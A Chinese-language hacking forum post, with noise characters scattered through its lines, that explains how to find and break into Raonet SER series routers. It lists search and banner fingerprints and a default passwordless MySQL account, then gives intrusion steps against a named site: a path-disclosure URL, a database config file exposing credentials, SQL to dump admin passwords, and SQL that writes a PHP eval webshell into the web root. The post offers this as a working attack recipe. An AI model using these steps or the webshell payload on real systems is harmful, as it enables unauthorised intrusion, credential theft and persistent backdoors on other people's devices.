寻找存在漏洞的路由器方法:6 g2 r& k0 l" X% R
) c& o" `1 N- \. o! `" a1:google搜索'Raonet Subscriber Ethernet Router'2 z' T) |0 o) w" K* o1 R8 K0 A
. m) E, c- j8 Y- p/ B5 c2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20012 [8 c% K! ^2 k) S; }
& F4 n' Q1 t( q: S
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
1 L5 [2 P2 Q/ c' m7 A w/ k
$ `' X& |3 b! ~1 c$ Q L; ~0 S//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成...... q/ f8 X0 b- J# `4 S' H/ N) S
O8 l/ M9 X) V
$ | p7 X$ E3 ?$ s1 n
# T1 ~: }0 Z& h! b8 f2 N
入侵步骤:) a/ J* f. ]1 o+ Z
# A O. O3 \" U5 Q# U
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php% c- J* R# Z) @1 N* R4 _
- ?/ P# Z, h, g& J- s' D R+ c2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc* c" q. A8 ^) r, n3 `5 y6 _3 u
3:得到密码后连接,查看GUI管理密码:: _8 f5 _' q$ j" D
use ser_500
1 k; _0 D$ i+ p0 Qselect id,passwd from user;
9 x! J9 H6 R# V X% b4:通过数据库写入webshell,执行命令:- ^- t$ Y6 n3 ^0 j
use mysql;8 ^' l6 |; ?9 l7 A4 _
create table ok(cmd TEXT);
. Q% m0 v# F5 Uinsert into ok values("<?php @eval($_POST[cmd])?>");
8 I8 k- }7 X5 A1 ]- r2 S7 @% iselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
7 v2 M3 y( Q% C1 C2 `) G' Jdrop table ok;6 ~8 o- U( Y6 K$ H
/ B& |, x+ m0 W R* \* L1 }" H5:连接后门shell.php
~' R2 |4 D0 E. R
& R+ t7 F+ z( M% K2 ^6. 搞定!
& B9 Y: b f! `& \) Z: G, H) d! f7 h/ G9 S5 I
|